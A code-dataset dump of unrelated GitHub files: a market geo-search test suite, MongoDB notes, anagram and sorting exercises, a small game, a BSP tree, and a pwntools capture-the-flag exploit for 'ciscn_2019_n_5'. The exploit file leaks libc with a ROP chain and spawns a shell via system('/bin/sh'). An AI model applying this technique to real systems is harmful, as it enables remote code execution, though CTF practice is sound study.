56.1),\n delivery_option=OutletDeliveryOption(price=10),\n ),\n ]\n\n cls.index.pickup_buckets += [\n PickupBucket(\n bucket_id=9301,\n fesh=12320,\n carriers=[99],\n options=[PickupOption(outlet_id=12321, price=0), PickupOption(outlet_id=12322, price=0)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=9302,\n carriers=[1030],\n options=[PickupOption(outlet_id=12323, price=10)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n ]\n\n cls.index.offers += [_Offers.pickup_offer, _Offers.store_offer, _Offers.post_term_offer]\n\n def test_not_only_top_offer_outlets(self):\n \"\"\"\n Проверка того, что на выдаче отображаются не только точки магазина, соответствующие\n наиболее релевантному документу.\n \"\"\"\n geo_request = (\n 'place=geo&rids=213&require-geo-coords=1&fesh=12320'\n '&tile=153%2C79&tile=153%2C80&tile=153%2C81&tile=154%2C79&tile=154%2C80&tile=154%2C81'\n '&tile=155%2C79&tile=155%2C80&tile=155%2C81&tile=156%2C79&tile=156%2C80&tile=156%2C81'\n '&zoom=8&ontile=5'\n )\n geo_tiles = geo_request + '&show-outlet=tiles'\n geo_offers = geo_request + '&show-outlet=offers'\n\n TestOutlet = namedtuple('Outlet', ['coord', 'id', 'type'])\n\n def as_tile(outlet):\n return {\"coord\": outlet.coord, \"outlets\": [{\"id\": str(outlet.id), \"type\": outlet.type}]}\n\n outlet_store = TestOutlet(coord={\"x\": 154, \"y\": 80, \"zoom\": 8}, id=12321, type='store')\n outlet_pickup = TestOutlet(coord={\"x\": 155, \"y\": 81, \"zoom\": 8}, id=12322, type='pickup')\n outlet_post_term = TestOutlet(coord={\"x\": 153, \"y\": 79, \"zoom\": 8}, id=12323, type='pickup')\n\n test_outlets = (outlet_store, outlet_pickup, outlet_post_term)\n test_offers = (_Offers.store_offer, _Offers.pickup_offer, _Offers.post_term_offer)\n\n # Проверяем, что по отдельности для каждого оффера доступна доставка только в один аутлет\n for offer, offer_outlet in zip(test_offers, test_outlets):\n tiles_response = self.report.request_json(geo_tiles + '&hyperid=' + offer.hyperid)\n for outlet in test_outlets:\n if outlet == offer_outlet:\n self.assertFragmentIn(tiles_response, {\"search\": {\"tiles\": [as_tile(outlet)]}})\n else:\n self.assertFragmentNotIn(tiles_response, {\"search\": {\"tiles\": [as_tile(outlet)]}})\n\n # И такая же проверка для варианта с запросом офферов\n offers_response = self.report.request_json(geo_offers + '&offerid=' + offer.ware_md5)\n self.assertFragmentIn(\n offers_response,\n {\n \"search\": {\n \"results\": [\n {\n \"entity\": \"offer\",\n \"outlet\": {\"entity\": \"outlet\", \"id\": str(offer_outlet.id), \"type\": offer_outlet.type},\n }\n ]\n }\n },\n allow_different_len=False,\n )\n\n # Для запроса без указания модели комбинациями флажков получаются все доступные точки магазина\n shop_response = self.report.request_json(geo_tiles)\n self.assertFragmentIn(shop_response, {\"search\": {\"tiles\": [as_tile(o) for o in test_outlets]}})\n\n @classmethod\n def prepare_mega_points(cls):\n cls.index.pickup_buckets += [\n PickupBucket(\n bucket_id=2300,\n carriers=[270],\n options=[PickupOption(outlet_id=12345670, price=100)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=2301,\n carriers=[270],\n options=[PickupOption(outlet_id=12345671, price=100)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n PickupBucket(\n bucket_id=2302,\n options=[PickupOption(outlet_id=12345672, price=100)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n ]\n\n cls.index.shops += [\n Shop(fesh=73001, regions=[1], delivery_service_outlets=[12345670, 12345671]),\n Shop(fesh=73002, regions=[1], delivery_service_outlets=[12345670, 12345671]),\n Shop(fesh=73003, regions=[1], delivery_service_outlets=[12345672]),\n ]\n\n cls.index.offers += [\n Offer(fesh=73001, title='offer from mega points 0 and 1 : 1', pickup_buckets=[2300, 2301]),\n Offer(fesh=73002, title='offer from mega points 0 and 1 : 2', pickup_buckets=[2300, 2301]),\n Offer(fesh=73003, title='offer from mega point 2 : 1', pickup_buckets=[2302]),\n ]\n\n cls.index.outlets += [\n Outlet(\n point_id=12345670,\n region=1,\n gps_coord=GpsCoord(37.1, 55.1),\n point_type=Outlet.FOR_PICKUP,\n delivery_service_id=270,\n ),\n Outlet(point_id=12345671, region=1, gps_coord=GpsCoord(37.15, 55.1), delivery_service_id=270),\n Outlet(point_id=12345672, region=1, gps_coord=GpsCoord(37.15, 55.15), fesh=73003),\n ]\n\n def test_show_outlet_entities(self):\n '''\n Проверяем логику работы geo с мега-точками: в один аутлет может доставлять несколько магазинов.\n Для этого geo должен возвращать по одному офферу на каждый аутлет\n и возвращать ответ results в другому формате: массив аутлетов, внутри которых лежит один оффер.\n Вся новая логика работает только при переданном параметре show-outlet-entities=true.\n '''\n req = 'place=geo&text=mega&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.2,55.2&rids=1&debug=da&how=search&show-outlet=offers'\n # Проверка старого формата. Всего 5 офферов из 3-х магазинов. У некоторых совпадают точки доставки, но группировки по аутлетам нет\n response = self.report.request_json(req)\n self.assertFragmentIn(\n response,\n [\n # две точки у магазина 73001\n {\n 'titles': {'raw': 'offer from mega points 0 and 1 : 1'},\n 'shop': {'id': 73001},\n 'outlet': {'id': '12345670'},\n },\n {\n 'titles': {'raw': 'offer from mega points 0 and 1 : 1'},\n 'shop': {'id': 73001},\n 'outlet': {'id': '12345671'},\n },\n # они же у магазина 73002\n {\n 'titles': {'raw': 'offer from mega points 0 and 1 : 2'},\n 'shop': {'id': 73002},\n 'outlet': {'id': '12345670'},\n },\n {\n 'titles': {'raw': 'offer from mega points 0 and 1 : 2'},\n 'shop': {'id': 73002},\n 'outlet': {'id': '12345671'},\n },\n # одна точка у магазина 73003\n {'titles': {'raw': 'offer from mega point 2 : 1'}, 'shop': {'id': 73003}, 'outlet': {'id': '12345672'}},\n ],\n )\n\n # Проверка нового формата с группировкой по аутлетам\n response = self.report.request_json(req + '&show-outlet-entities=true')\n self.assertFragmentIn(\n response,\n {\n \"results\": [\n {\n \"entity\": \"outlet\",\n \"id\": \"12345670\",\n \"isMegaPoint\": True,\n \"serviceId\": 270,\n \"offer\": {\n \"entity\": \"offer\",\n },\n },\n {\n \"entity\": \"outlet\",\n \"id\": \"12345671\",\n \"isMegaPoint\": True,\n \"serviceId\": 270,\n \"offer\": {\n \"entity\": \"offer\",\n },\n },\n {\n \"entity\": \"outlet\",\n \"id\": \"12345672\",\n \"isMegaPoint\": False,\n \"serviceId\": 99,\n \"offer\": {\n \"entity\": \"offer\",\n },\n },\n ]\n },\n allow_different_len=False,\n )\n\n '''\n Тест, что filters и sorts отсутствуют внутри search\n '''\n self.assertFragmentIn(response, {\"search\": {\"results\": [], \"filters\": Absent(), \"sorts\": Absent()}})\n\n @classmethod\n def prepare_regset(cls):\n cls.index.shops += [Shop(fesh=73004)]\n\n cls.index.pickup_buckets += [\n PickupBucket(\n bucket_id=90002,\n options=[PickupOption(outlet_id=90002, price=100)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n ]\n\n cls.index.outlets += [\n Outlet(point_id=90002, region=2, gps_coord=GpsCoord(37.15, 55.15), fesh=73004),\n ]\n\n cls.index.offers += [Offer(fesh=73004, title='offer', pickup_buckets=[90002])]\n\n def test_regset(self):\n '''\n Проверяем работу regset=1\n Проверяем, что при запросе с rids=1 и аутлетом из rids=2 оффер приходит\n '''\n response = self.report.request_json('place=geo&fesh=73004&point_id=90002&rids=1®set=1')\n self.assertFragmentIn(\n response,\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"offer\"},\n },\n )\n\n ''' Проверяем, что без regset=1 и с rids=2 оффер есть (запрос из региона аутлета) '''\n response = self.report.request_json('place=geo&fesh=73004&point_id=90002&rids=2')\n self.assertFragmentIn(\n response,\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"offer\"},\n },\n )\n\n ''' Проверяем, что с regset=1 и с rids=2 оффер есть (запрос из региона аутлета) '''\n response = self.report.request_json('place=geo&fesh=73004&point_id=90002&rids=2®set=1')\n self.assertFragmentIn(\n response,\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"offer\"},\n },\n )\n\n ''' Проверяем, что без regset=1 оффера нет (так как этот аутлет не из региона пользователя) '''\n response = self.report.request_json('place=geo&fesh=73004&point_id=90002&rids=1')\n self.assertFragmentNotIn(\n response,\n {\n \"entity\": \"offer\",\n \"titles\": {\"raw\": \"offer\"},\n },\n )\n\n virtual_model_id_range_start = int(2 * 1e12)\n virtual_model_id_range_finish = int(virtual_model_id_range_start + 1e15)\n virtual_model_id = (virtual_model_id_range_start + virtual_model_id_range_finish) // 2\n\n @classmethod\n def prepare_virtual_model(cls):\n cls.index.shops += [\n Shop(fesh=4242, priority_region=1, name='Shop11'),\n ]\n\n cls.index.outlets += [\n Outlet(point_id=4242, fesh=4242, region=1, gps_coord=GpsCoord(37.1, 55.1), point_type=Outlet.FOR_STORE),\n ]\n\n cls.index.pickup_buckets += [\n PickupBucket(\n bucket_id=4242,\n fesh=4242,\n carriers=[99],\n options=[PickupOption(outlet_id=4242)],\n delivery_program=DeliveryBucket.REGULAR_PROGRAM,\n ),\n ]\n\n cls.index.offers += [\n Offer(\n waremd5='OfferNoModel_________g',\n title=\"Наковальня #10\",\n fesh=4242,\n hid=4242,\n pickup_buckets=[4242],\n virtual_model_id=T.virtual_model_id,\n ),\n ]\n\n def test_virtual_model(self):\n # Теперь флаги виртуальных карточек по-умолчанию включены\n request_base = (\n 'place=geo&geo-location=37.15,55.15&geo_bounds_lb=37.0,55.0&geo_bounds_rt=37.2,55.2&hyperid=%s&rids=0'\n % T.virtual_model_id\n )\n flags = '&rearr-factors=market_cards_everywhere_range={}:{}'.format(\n T.virtual_model_id_range_start, T.virtual_model_id_range_finish\n )\n response = self.report.request_json(request_base + flags)\n self.assertFragmentIn(\n response,\n {\n \"search\": {\n \"total\": 1,\n \"shops\": 1,\n \"shopOutlets\": 1,\n \"results\": [\n {\n \"entity\": \"offer\",\n \"bundleCount\": 1,\n \"bundled\": {\n \"count\": 1,\n \"modelId\": T.virtual_model_id,\n \"outletId\": 4242,\n },\n \"wareId\": \"OfferNoModel_________g\",\n \"outlet\": {\n \"id\": \"4242\",\n },\n },\n ],\n },\n },\n allow_different_len=False,\n )\n\n for flags in [\n '&rearr-factors=market_cards_everywhere_geo=0',\n '&rearr-factors=market_cards_everywhere_geo=1;market_cards_everywhere_range={}:{}'.format(\n T.virtual_model_id_range_start, T.virtual_model_id_range_start + 1\n ),\n ]:\n response = self.report.request_json(request_base + flags)\n self.assertFragmentIn(\n response,\n {\n \"search\": {\"total\": 0, \"shops\": 0, \"shopOutlets\": 0, \"results\": NoKey(\"results\")},\n },\n allow_different_len=False,\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/GENERAL/test_geo.py","file_name":"test_geo.py","file_ext":"py","file_size_in_byte":147743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30220204255","text":"#引入模块,创建链接\nfrom pymongo import MongoClient\n\nclient = MongoClient()\n#本地默认端口的话就这么写。不然可能需要改动\n\n#本地端口有所调整:\nclient = MongoClient('mongodb://localhost:28017/')\n\n#指定数据库\ndb = client.local\n\n#指定集合,oplog.rs是存放日志的集合\ncollection = db.oplog.rs\n\n#findone()返回单个结果,find()返回一个生成器对象\n#对于find,https://www.cnblogs.com/huang-yc/p/10453275.html\nresult = collection.find({'age':{'$gt':20}})\n\n#关于oplog中一些字段的含义,\n#op: the write operation that should be applied to the slave. n indicates a no-op, this is just an informational message.\n#ns: the database and collection affected by this operation. Since this is a no-op, this field is left blank.\n#o: the actual document representing the op. Since this is a no-op, this field is pretty useless._id这个字段就在这里,这里也有很多i,n,c等\n#i:insert;u:updata;d:delete;c:db cmd;n:空操作\n#wall。毫秒粒度墙上时钟。\n#需要注意的是,o字段的格式与其他字段不同,o字段是bson.D的结构(数组嵌套字段)\n\n#关于将数据写入mongodb,主要是insert(),insertMany()方法\n#db.collection.insertOne(\n# ,\n# {\n# writeConcern: \n# }\n#)\n#_id是主键,对应objectid(\"...\")","repo_name":"kiki123meng/temp","sub_path":"sandbox/mongotest.py","file_name":"mongotest.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22559347881","text":"'''\nAuthor: Ivy Xue\nTime: 11/23/2020\nThis file solves Anagram Problem.\nDescription: Anagram is a word or phrase made by transposing the letters of another word or phrase.\nInput Parameter: two words s1, s2 with the same length and all the letters are lower case.\nThe function will return whether the two words are anagram.\nReturn: True or False\n'''\n\ndef anagram1(s1,s2):\n '''\n This function will literate through s1, find out whether each charater in s1 can be found correspondingly in s2.\n There are nested loops in this algo. \n This is O(n^2) algorithm.\n '''\n pos1 = 0\n list2 = list(s2)\n stillOK = True\n while pos1 < len(s1) and stillOK :\n pos2 = 0\n found = False\n while pos2 < len(list2) and not found: \n if s1[pos1] == list2[pos2]:\n found = True\n else:\n pos2 = pos2 + 1\n if found :\n list2[pos2] = None\n else :\n stillOK = False\n pos1 = pos1 + 1\n return stillOK\n\n\ndef anagram2(s1,s2):\n '''\n This function will convert s1,s2 to list and then sort, \n find out whether the sorted list are exactly the same.\n Sorting method dominant the algo.\n This is O(n^2) or O(nlogn) algorithm depending on sorting method.\n '''\n list1 = list(s1)\n list2 = list(s2)\n list1.sort()\n list2.sort()\n stillOK = True\n for i in range(len(s1)):\n if list1[i] != list2[i]:\n stillOK = False\n break\n return stillOK\n\ndef anagram3(s1,s2):\n '''\n This function will count the frequency of 26 characters in s1,s2 using a 26 characters list. \n find out whether the counts are exactly the same.\n This is O(n) algorithm depending on sorting method.\n '''\n count1 = [0]*26\n count2 = [0]*26\n stillOK = True\n for i in range(len(s1)):\n pos = ord(s1[i]) - ord(\"a\")\n count1[pos] = count1[pos] + 1\n for i in range(len(s2)):\n pos = ord(s2[i]) - ord(\"a\")\n count2[pos] = count2[pos] + 1\n for i in range(len(count1)):\n if count1[i] != count2[i]:\n stillOK = False\n return stillOK\n\ndef anagram4(s1,s2):\n '''\n This function will count the frequency of 26 characters in s1,s2 using dictionary. \n find out whether the counts are exactly the same.\n This is O(n) algorithm depending on sorting method.\n '''\n dict1 = dict()\n dict2 = dict()\n stillOK = True\n for c in s1:\n if c not in dict1:\n dict1[c] = 1\n else:\n dict1[c] += 1\n for c in s2:\n if c not in dict2:\n dict2[c] = 1\n else:\n dict2[c] += 1\n return dict1 == dict2\n \n\nif __name__ == \"__main__\":\n print(anagram1('python','typhon'))\n print(anagram1('hhhhhh','typhon'))\n print(anagram2('python','typhon'))\n print(anagram2('hhhhhh','typhon'))\n print(anagram3('python','typhon'))\n print(anagram3('hhhhhh','typhon'))\n print(anagram4('python','typhon'))\n print(anagram4('hhhhhh','typhon'))\n \n\n","repo_name":"ivyxue16/Data-Structure","sub_path":"Code/anagram.py","file_name":"anagram.py","file_ext":"py","file_size_in_byte":3021,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"15045112640","text":"from art import logo\nfrom art import vs\nfrom game_data import data\nfrom os import system\nimport random\n\n'''*************************************[Game-Code]**************************************'''\nplay_again = True \nwhile play_again == True:\n true = True \n your_score = 0\n while true == True:\n print(logo)\n # Display Your score \n print(f'Your current Score: {your_score}')\n # 1st-pick that wiil be compared with nxt one\n rand_pick = random.choice(data)\n # print 1st-pick \n print(f\"Compare A : {rand_pick['name']}, a {rand_pick['description']} from {rand_pick['country']}.\")\n # print VS logo \n print(vs)\n # 2nd-pick that to be compared with 1st one\n vs_pick = random.choice(data)\n # print 2nd-pick \n print(f\"Compare B : {vs_pick['name']}, a {vs_pick['description']} from {vs_pick['country']}.\")\n # compare N make descition\n user_desc = str(input(\"who's got the more followers? [A/B] \"))\n user_desc_Aa = user_desc.upper()\n while user_desc_Aa not in ['A' , 'B']:\n print('Invalid input!')\n user_desc = str(input(\"who's got the more followers? [A/B] \"))\n user_desc_Aa = user_desc.upper()\n\n A = rand_pick['follower_count']\n B = vs_pick['follower_count']\n # print(user_desc_Aa) \n # print(A)\n # print(B)\n\n # decide who has more A OR B\n if B < A and user_desc_Aa == 'A':\n your_score +=1\n system('cls')\n elif B > A and user_desc_Aa == \"B\":\n your_score +=1\n system('cls')\n else:\n print('Wrong Choice!')\n true = False\n\n user_inpt = input('Play Again? [y/n]')\n while user_inpt not in ['y' , 'n']:\n print('Invalid input!')\n user_inpt = input('Play Again? [y/n]')\n\n if user_inpt == 'y':\n pass\n else:\n play_again = False\n\n \n'''**************************************[END]************************************************'''","repo_name":"SNEHASISHROY-125/vs_follower-game","sub_path":"vs follower-game.py","file_name":"vs follower-game.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2292538175","text":"# Combsort\r\nfrom time import time\r\nfrom random import randrange\r\nimport myplot as mp\r\n\r\nMIN = 1000\r\nMAX = 20000\r\nSTEP = 1000\r\n\r\ndef combsort(lista):\r\n gap = len(lista)\r\n changes = True\r\n while gap > 1 or changes:\r\n if gap > 1:\r\n gap = max(1,int(gap/1.3))\r\n changes = False\r\n i = 0\r\n #print (gap,changes,i)\r\n while i + gap <= len(lista)-1:\r\n #print(\"\\t\",i,gap,changes,lista[i],lista[i+gap])\r\n if lista[i] > lista[i+gap]:\r\n lista[i],lista[i+gap] = lista[i+gap],lista[i]\r\n changes = True\r\n #print(\"\\t\\t\",changes)\r\n i += 1\r\n return lista\r\n\r\ndef main():\r\n\r\n sizes = []\r\n timings = []\r\n\r\n for i in range(MIN,MAX+1,STEP):\r\n sizes.append(i)\r\n lista = [randrange(1,MAX) for i in range(i)]\r\n t0 = time()\r\n lista = combsort(lista)\r\n t = time() - t0\r\n timings.append(t)\r\n print(\"Att sortera {} heltal tog {:.3f} sekunder\".format(i,t))\r\n print(\"Plottar resultat...\")\r\n mp.plotsetup(mywidth = 600, myheight = 600, xmin = 0, ymin = 0, \\\r\n xmax = MAX, ymax = max(timings), xgridsize = STEP, \\\r\n ygridsize = 2*min(timings), xlabel = 'n',\r\n ylabel = 'time (sec.)', plottitle = 'Combsort' )\r\n mp.plotcurve(sizes, timings, 'red')\r\n mp.plotfinish()\r\n \r\nmain()\r\n","repo_name":"slimebob1975/python-edu","sub_path":"combsort.py","file_name":"combsort.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17165257660","text":"from pwn import *\r\nimport sys\r\nremote_addr = [\"node4.buuoj.cn\",25055]\r\nlibc = ELF('./libc-2.27.so')\r\nelf = ELF('./ciscn_2019_n_5')\r\nif len(sys.argv) == 1:\r\n context.log_level=\"debug\" \r\n #p = process([\"qemu-aarch64\", \"-L\", \"/usr/aarch64-linux-gnu/\", \"-g\",\"1234\",\"./stack\"]) \r\n #p = process([\"qemu-aarch64\", \"-L\", \".\", \"./stack\"]) \r\n p = process(\"./ciscn_2019_n_5_patched\")\r\n context(arch='amd64', os='linux')\r\n context.terminal = ['tmux', 'splitw', '-h']\r\nif len(sys.argv) == 2 :\r\n if 'r' in sys.argv[1]:\r\n p = remote(remote_addr[0],remote_addr[1])\r\n if 'n' not in sys.argv[1]:\r\n context.log_level=\"debug\" \r\n #context(arch = 'amd64', os = 'linux')\r\nr = lambda : p.recv()\r\nrl = lambda : p.recvline()\r\nrc = lambda x: p.recv(x)\r\nru = lambda x: p.recvuntil(x)\r\nrud = lambda x: p.recvuntil(x, drop=True)\r\ns = lambda x: p.send(x)\r\nsl = lambda x: p.sendline(x)\r\nsa = lambda x, y: p.sendafter(x, y)\r\nsla = lambda x, y: p.sendlineafter(x, y)\r\nshell = lambda : p.interactive()\r\npr = lambda name,x : log.info(name+':'+hex(x))\r\n\r\nDEBUG = 1\r\n\r\ndef debug(bp = None):\r\n if DEBUG == 1:\r\n if bp != None:\r\n gdb.attach(p, bp)\r\n else:\r\n gdb.attach(p)\r\n\r\npop_rdi = 0x400713\r\nret = 0x4004c9\r\nputs_got = elf.got['puts']\r\nputs_plt = elf.plt['puts']\r\nmain = 0x400636\r\n\r\nsa(b'name\\n', b'a')\r\npayload = b'a' * (0x20 + 8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)\r\nsla(b'me?\\n', payload)\r\n\r\nlibc.address = u64(ru(b'\\x7f')[-6:].ljust(8, b'\\x00')) - libc.sym['puts']\r\npr('libc.address', libc.address)\r\n\r\nsystem = libc.sym['system']\r\nbinsh = next(libc.search(b'/bin/sh\\x00'))\r\n\r\nsa(b'name', b'a')\r\npayload = b'a' * (0x20 + 8) + p64(ret) + p64(pop_rdi) + p64(binsh) + p64(system)\r\nsla(b'me?\\n', payload)\r\n\r\n\r\nshell()\r\n","repo_name":"BattiestStone4/pwn-problems","sub_path":"ciscn2019_n_5/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"72"} +{"seq_id":"33899731695","text":"# coding: utf-8\nimport random\nfrom rect import Rect, SIZE\nfrom PIL import Image, ImageDraw, ImageFont\n\n\nclass BSPTree:\n def __init__(self, n_max_nodes=32):\n self.MAX_NODES = n_max_nodes\n self.root = TreeNode(label=\"A\")\n self._nodes = [self.root]\n self._leaves = [self.root]\n self.idx = 0\n self.last_label = \"A\"\n\n def _get_next_label(self):\n label = chr(ord(self.last_label)+1)\n self.last_label = label\n return label\n\n def add_n_nodes(self, n_nodes=10):\n for i in range(n_nodes):\n node = TreeNode(label=self._get_next_label())\n self.nodes.append(node)\n\n def _stop_condition_met(self):\n return len(self.nodes) >= self.MAX_NODES or len(self.nodes) == 0\n\n def _do_split(self):\n while not self._stop_condition_met():\n node = self._get_next_node()\n print(\"Processing node {}.\".format(node))\n self.leaves.remove(node)\n\n l_child = TreeNode(label=self._get_next_label())\n r_child = TreeNode(label=self._get_next_label())\n\n if random.random() > 0.5:\n split_func = node.rect.split_half\n else:\n split_func = node.rect.split\n\n l_child.rect, r_child.rect = split_func()\n\n if l_child.is_suitable():\n print(\"Criado {}\".format(l_child))\n self.nodes.append(l_child)\n self.leaves.append(l_child)\n\n if r_child.is_suitable():\n print(\"Criado {}\".format(r_child))\n self.nodes.append(r_child)\n self.leaves.append(r_child)\n\n def _get_next_node(self):\n assert self.idx < len(self.nodes), u\"Trying to access invalid position {}\".format(self.idx)\n res = self.nodes[self.idx]\n self.idx += 1\n return res\n\n @property\n def leaves(self):\n return self._leaves\n\n @property\n def nodes(self):\n return self._nodes\n\n @property\n def rects(self):\n return [leaf.rect for leaf in self._leaves]\n\n\nclass TreeNode:\n def __init__(self, label=\"\"):\n self.rect = Rect(0, 0, *SIZE)\n self.label = label\n\n def is_suitable(self):\n \"\"\" Testing if this instance is suitable. Wraps is_suitable() from Rect \"\"\"\n\n return self.rect.is_suitable()\n\n def __str__(self):\n return u\"<{}> {}\".format(self.label, self.rect)\n\n\ndef print_bsp(tree, name=\"bsp_tree_test.bmp\"):\n font = ImageFont.truetype(\"Ubuntu-R.ttf\", 14)\n im = Image.new('RGB', SIZE)\n draw = ImageDraw.Draw(im)\n\n fill = 'blue'\n outline = 'black'\n\n for node in tree.leaves:\n coords = list(node.rect._switch_coordinates())\n draw.rectangle(coords, fill, outline)\n draw.text(xy=node.rect._get_center(), text=node.label.upper(), fill=(0, 0, 0), font=font)\n\n im.save(name)\n","repo_name":"luizpericolo/ppgi-masi-dissertacao","sub_path":"src/bsp.py","file_name":"bsp.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37756102159","text":"#coding=utf-8\nimport sys\n\ndef top_k_num(n, m, k):\n\n l, r = 1, n * m + 1\n while l < r:\n mid = (l + r) // 2\n count = 0\n temp = mid - 1\n for i in range(1, n + 1):\n count += min(m, temp // i)\n if count >= k:\n r = mid\n else:\n l = mid + 1\n return l - 1\n\nif __name__ == \"__main__\":\n\n n, m, k = list(map(int, sys.stdin.readline().strip().split()))\n\n print(top_k_num(n, m, k))","repo_name":"wuyaqiang/Algorithm_Learn","sub_path":"笔试题 记录/秋招/拼多多 - 寻梦计划/No_4.py","file_name":"No_4.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33299267116","text":"\"\"\"\r\nSolves the SIR system of ODEs over a number of parameters in serial\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom scipy.integrate import solve_ivp\r\nimport matplotlib.pyplot as plt\r\n\r\n#time points to solve at\r\ntpts = np.linspace(0,200,1001) #run longer\r\n\r\n#initial values as population fractions\r\nI0 = 1e-2\r\nR0 = 0\r\n\r\n# parameter values\r\nparams = {}\r\nparams['beta'] = 1.4247\r\nparams['gamma'] = 0.14286\r\nparams['mu'] = 0.01\r\n\r\nbeta_list = np.linspace(0,4,10001) #up this by an order of magnitude to slow it down\r\n\r\n##################################\r\n\r\n# vectorize initial conditions\r\nx0 = np.array([1-I0-R0, I0, R0])\r\n\r\n# define ode equations\r\ndef SIR_ODEs_beta(t,x,params,beta):\r\n '''This function returns the time derivates of S,I,R.\r\n\r\n The ode solver expects the first two arguments to be t and x\r\n NOTE: This is the OPPPOSITE order from scipy.integrate.odeint!!\r\n\r\n The params argument should be a dict with beta, gamma, and mu as keys.\r\n It must be passed into the solver using the set_f_params method\r\n '''\r\n\r\n S = x[0]; I = x[1]; R = x[2]\r\n dx = np.zeros(3)\r\n\r\n dx[0] = -beta*S*I + params['mu']*(I+R)\r\n dx[1] = beta*S*I - params['gamma']*I - params['mu']*I\r\n dx[2] = params['gamma']*I - params['mu']*R\r\n\r\n return dx\r\n\r\n##### Solve procedure #####\r\n# For each beta in beta_list, solve the system of ODEs\r\n# Save only the solution at the final time.\r\nfsol = []\r\nfor beta in beta_list:\r\n sol = solve_ivp(SIR_ODEs_beta, t_span=[tpts[0], tpts[-1]], y0=x0, \r\n args=(params,beta))\r\n fsol.append(sol.y[:,-1])\r\n\r\n##### Plot result #####\r\nfig = plt.figure(figsize=(9,7))\r\nfsol = np.array(fsol)\r\nplt.plot(beta_list,fsol[:,0],beta_list,fsol[:,1],beta_list,fsol[:,2])\r\nplt.legend(['S-final','I-final','R-final'])\r\nplt.title(\"Plot of $S,I,R$ final by $\\\\beta$\")\r\nplt.xlabel(\"$\\\\beta$\")\r\nplt.ylabel(\"population fraction\")\r\nplt.show()\r\n\r\n","repo_name":"mountaindust/Python_tutorial","sub_path":"SIR_params.py","file_name":"SIR_params.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8178602493","text":"def tax(salary):\n if salary>2000:\n t=salary*21/100\n else:\n t=salary*15/100\n return t\nsalary1=int(input(\"enter your salary:\"))\nprint(\"----------------------------------------------\")\nprint(\"your annual NET pay is:\",int(salary1-tax(salary1)))\nprint(\"your monthly NET pay is:\",int((salary1-tax(salary1))/12))\n","repo_name":"l3umh/PythonWeek","sub_path":"tax.py","file_name":"tax.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3690472088","text":"from email.utils import quote\r\nfrom products import *\r\nfrom products_handle import *\r\n\r\nif __name__ == \"__main__\":\r\n try:\r\n q = QueryHandler(\"127.0.0.1\", \"sqlassignment\", \"root\", \"\")\r\n p1 = products(\"13f45ghtd4\", \"p11\", 35)\r\n p2 = products(\"9fktjrne7g\", \"p22\", 54)\r\n p3 = products(\"1fsc378623\", \"p33\", 25)\r\n p4 = products(\"3453fsc942\", \"p44\", 15)\r\n # PRINTING products information\r\n print(p1.__str__())\r\n # Showing all products\r\n show_all_products(q)\r\n # adding products to the database\r\n adding_product(p1, q)\r\n adding_product(p2, q)\r\n adding_product(p3, q)\r\n adding_product(p4, q)\r\n adding_product(p1, q)\r\n \r\n # Showing all products\r\n show_all_products(q)\r\n # deleting products\r\n delete_product(p3.barcode, q)\r\n # Showing all products\r\n show_all_products(q)\r\n # Activating the code\r\n start_Code(q)\r\n except ValueError as v:\r\n print(v)\r\n # Activating the code after printing the error\r\n start_Code(q)\r\n except TypeError as t:\r\n print(t)\r\n start_Code(q)","repo_name":"EbraFH/Python-SQL-Assessment","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8592071818","text":"from tkinter import *\n#Everything in tkinter is a widget\n\nroot = Tk()\n\n#define what the button will do\ndef myClick():\n\tmyLabel = Label(root, text=\"Look! I clicked a Button!!\")\n\tmyLabel.pack()\n\n#set up button widget\nmyButton = Button(root, text = \"Click Me!\", command=myClick, fg=\"blue\", bg=\"#000000\")\nmyButton.pack()\n\nroot.mainloop()\n","repo_name":"declan-1992/Tkinter-Tutorial","sub_path":"buttons.py","file_name":"buttons.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32413501134","text":"from rich.table import Table\nfrom rich.console import Console\n\ndef print_Table(alias_list,alias):\n table = Table(title=alias)\n table.add_column(\"Alias\", style=\"\", 